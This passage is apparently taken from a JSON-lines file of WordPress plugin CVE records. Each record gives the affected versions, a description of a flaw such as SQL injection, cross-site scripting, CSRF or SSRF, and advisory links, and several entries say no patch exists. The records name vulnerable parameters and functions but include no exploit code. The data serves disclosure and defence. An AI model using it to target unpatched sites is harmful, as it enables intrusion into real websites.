replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a128018b-f19b-4b18-a53c-cf1310d3d0e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a128018b-f19b-4b18-a53c-cf1310d3d0e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L916\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L916\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L939\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L958\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50856","slug":"funnel-builder","versionImpact":"2.14.3","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits.This issue affects Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n\/a through 2.14.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/funnel-builder\\\/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/funnel-builder\\\/wordpress-funnel-builder-for-wordpress-by-funnelkit-plugin-2-14-3-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1408","slug":"wp-user-avatar","versionImpact":"4.14.4","description":"The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edit-profile-text-box shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes such as 'type'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/sr\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L524\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-user-avatar\\\/blob\\\/fde360946c86d67610d8f95a82752199ce25b39a\\\/wp-user-avatar\\\/sr\\\/ShortcodeParser\\\/Builder\\\/FieldsShortcodeCallback.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0614","slug":"events-manager","versionImpact":"6.4.6.4","description":"The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6288fddf-926f-4506-94de-696e0a23766d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6288fddf-926f-4506-94de-696e0a23766d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0614\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042128\\\/events-manager\\\/trunk\\\/admin\\\/em-options.php?old=2769385&old_path=events-manager\\\/trunk\\\/admin\\\/em-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042128\\\/events-manager\\\/trunk\\\/admin\\\/em-options.php?old=2769385&old_path=events-manager\\\/trunk\\\/admin\\\/em-options.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4382","slug":"commons-booking","versionImpact":"0.9.4.18","description":"The CB (legacy) WordPress plugin through 0.9.4.18 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting codes, timeframes, and bookings via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a67aeab-8145-4c8a-9c18-e6436fa39b63\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a67aeab-8145-4c8a-9c18-e6436fa39b63\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9455","slug":"wp-cleanup-and-basic-functions","versionImpact":"2.2.1","description":"The WP Cleanup and Basic Functions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28bdaf44-6f2c-440a-a96f-bdcd71fb7bea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28bdaf44-6f2c-440a-a96f-bdcd71fb7bea?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cleanup-and-basic-functions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-cleanup-and-basic-functions\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9589","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'new_meta_name' parameter in the 'wpaft_option_page' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L232\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8874","slug":"ajax-login-and-registration-modal-popup","versionImpact":"2.24","description":"The AJAX Login and Registration modal popup + inline form plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.24. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11a561a-c798-46e7-bf2d-12933978aa29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11a561a-c798-46e7-bf2d-12933978aa29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-login-and-registration-modal-popup\\\/trunk\\\/includes\\\/class-settings.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-login-and-registration-modal-popup\\\/trunk\\\/includes\\\/class-settings.php#L177\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13856","slug":"make-builder","versionImpact":"1.1.10","description":"The Your Friendly Drag and Drop Page Builder \u2014 Make Builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.1.10 via the make_builder_ajax_subscribe() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/make-builder\\\/trunk\\\/plugins-screen.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/make-builder\\\/trunk\\\/plugins-screen.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3259333%40make-builder%2Ftrunk&old=2235851%40make-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3259333%40make-builder%2Ftrunk&old=2235851%40make-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/make-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/make-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffcb74b-230b-4629-b22d-5db96ac5fa06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffcb74b-230b-4629-b22d-5db96ac5fa06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3869","slug":"4stats","versionImpact":"2.0.9","description":"The 4stats plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the stats\/stats.php page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/4stats\\\/tags\\\/2.0.9\\\/4stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/4stats\\\/tags\\\/2.0.9\\\/4stats.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/4stats\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/4stats\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453b246f-7e39-4adb-9506-77d96146ab50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/453b246f-7e39-4adb-9506-77d96146ab50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0723","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_move_object function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc01108f-e781-484b-997a-c1d4e218a3f4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc01108f-e781-484b-997a-c1d4e218a3f4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0292","slug":"quiz-master-next","versionImpact":"8.0.8","description":"The Quiz And Survey Master plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.0.8. This is due to missing nonce validation on the function associated with the qsm_remove_file_fd_question AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary media files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c75e6d27-7f6b-4bec-b653-c2024504f427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c75e6d27-7f6b-4bec-b653-c2024504f427?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2143","slug":"enable-svg-webp-ico-upload","versionImpact":"1.0.3","description":"The Enable SVG, WebP & ICO Upload WordPress plugin through 1.0.3 does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91898762-aa7d-4fbc-a016-3de48901e5de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91898762-aa7d-4fbc-a016-3de48901e5de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5743","slug":"telephone-number-linker","versionImpact":"1.2","description":"The Telephone Number Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'telnumlink' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06424d9f-0064-4101-b819-688489a18eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06424d9f-0064-4101-b819-688489a18eee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/telephone-number-linker\\\/tags\\\/1.2\\\/telnumlinker.php#L36\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1390","slug":"paid-member-subscriptions","versionImpact":"2.11.1","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the creating_pricing_table_page function in all versions up to, and including, 2.11.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create pricing tables.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/admin\\\/class-admin-subscription-plans.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/admin\\\/class-admin-subscription-plans.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4700","slug":"wp-table-builder","versionImpact":"1.4.14","description":"The WP Table Builder \u2013 WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button element in all versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure WP Table Builder can be extended to contributors.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd08ac-826f-40dd-804a-546b0c334b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20cd08ac-826f-40dd-804a-546b0c334b66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/element-classes\\\/elements\\\/button-element.php#L343\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/element-classes\\\/elements\\\/button-element.php#L343\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088612\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088612\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4381","slug":"commons-booking","versionImpact":"0.9.4.18","description":"The CB (legacy) WordPress plugin through 0.9.4.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b3cda9a-17a7-4173-93a2-d552a874fae9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b3cda9a-17a7-4173-93a2-d552a874fae9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7413","slug":"obfuscate-email","versionImpact":"3.8.1","description":"The Obfuscate Email plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.8.1. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228079da-3c69-423c-b69b-f1a670258772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228079da-3c69-423c-b69b-f1a670258772?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/obfuscate-email\\\/trunk\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/obfuscate-email\\\/trunk\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9588","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'wpaft_option_page' function. This makes it possible for unauthenticated attackers to add and delete taxonomy meta, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L103\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10887","slug":"nicejob","versionImpact":"3.6.5","description":"The NiceJob plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes (nicejob-lead, nicejob-review, nicejob-engage, nicejob-badge, nicejob-stories) in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dd6a90e-03da-43e5-b975-be8f5aa5fc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dd6a90e-03da-43e5-b975-be8f5aa5fc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L390\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1702","slug":"ultimate-member","versionImpact":"2.10.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'search' parameter in all versions up to, and including, 2.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the 